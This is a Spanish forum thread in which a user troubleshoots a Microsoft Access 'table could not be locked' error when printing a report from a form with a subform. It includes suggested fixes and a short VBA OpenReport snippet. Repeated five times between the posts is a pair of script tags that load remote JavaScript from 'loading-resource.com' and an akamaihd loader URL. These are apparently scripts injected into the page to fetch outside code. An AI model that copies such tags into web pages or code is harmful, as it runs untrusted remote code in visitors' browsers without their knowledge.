El motor de base de datos no pudo bloquear la tabla "XXX" porque actualmente la está utilizando otr

Tengo un formulario con un subformulario y al crear un botón para imprimir me da un error:

"El motor de base de datos no pudo bloquear la tabla "XXX" porque actualmente la está utilizando otro usuario o proceso."

Esa base de datos está en construcción y sólo la estoy usando yo, no está abierta ninguna tabla además.

He probado a generar el evento con visual, con macros, a poner otro botón que me abra el informe, a poner otro que me de una vista previa del informe, a botones de imprimir registro, imprimir formulario... Y nada, siempre el mismo error cuando el los demás formularios no tengo ningún problema...

¿Podría ser por ser un formulario con subformulario? No lo entiendo...

1 respuesta

Respuesta

No es fácil la pregunta. El origen del problema pueden ser muchos. Sigue los siguientes pasos:

1) Comprueba que no hay ningún formulario, informe o cualquier otro objeto que este utilizando esa tabla. (Mira que no sea una tabla vinculada)

2) En vista diseño del informe, confirma que en propiedades tiene en el apartado "Bloqueo de registros", puesto a "Sin bloquear". Prueba. Si no funciona paso siguiente.

3) Compacta y repara la Bd y prueba.

4) Crea una nueva BD y copia todos los objetos y tablas. Prueba

Si con ninguno de los anteriores pasos te funciona, pudiera ser un tema de relaciones entre las tablas, o un error de access.

Mira a ver y me comentas. Si con todo no te funciona no tengo inconveniente en que me envíes la Bd con 2 datos ficticios para ver donde esta el problema.

Un saludo y no olvides visitar EL FORO

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Hola!!

Pues creo que ya lo he comprobado todo y nada... no doy con el error.

Es una base de datos en construcción, si quieres te la puedo pasar para que la mires, la verdad es que no tengo ni idea de qué puede pasarle...

Pues nada, mandame la Bd y la miro a ver que se puede hacer:
[email protected]

Un saludo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Te llegó?

Pues en este momento 21:05 hora de España, no me ha llegado nada.

Un saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

ok, te lo vuelvo a pasar... yo también estoy en España

Te lo acabo de reenviar. 21:34h.

Te llegará desde un correo con nombre de joyería. Soy yo!

Gracias, hoy llevo todo el día liada con esto y cada vez me lío más :)

Vale. Me ha llegado lo miro y te comento.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Gracias!!!!!!!!!!

De momento he conseguido que no me salga ese mensaje pero al abrir la vista previa del informe, me sale la cabecera de un informe que no es el actual con el pié pero sin el subinforme de las líneas de albarán....

Este es el código que le tengo puesto:

Private Sub Comando120_Click()
On Error GoTo Err_Comando120_Click
DoCmd.OpenReport "INFORME_ALBARANES", acPreview, , "ID_ALBARAN=" & Nz(Me.ID_ALBARAN, 0)
Exit_Comando120_Click:
Exit Sub
Err_Comando120_Click:
MsgBox Err.Description
Resume Exit_Comando120_Click
End Sub

Se supone que Informe Albaranes engloba informe y subinforme, no?

Perdona CODCOD pero he estado ausente por motivos de salud (¡Que le vamos a hacer"), retomo el tema y te contesto.

No te preocupes Kepasada, no se cómo lo he hecho, pero está solventado :)

Si me quieres seguir ayudando ayer publiqué otra pregunta, seguramente absurda, pero que me está calentando la cabeza,

No te preocupes, lo primero es la salud, espero que no sea nada grave, un saludo!

Te la finalizo con bien para que nadie entre para buscar una respuesta que no se poner, quería borrar la pregunta pero no se puede. Espero que te parezca correcto, porque por mi parte, sólo con la intención ya estoy agradecida como para darte un excelente.

Cuídate

Saludos!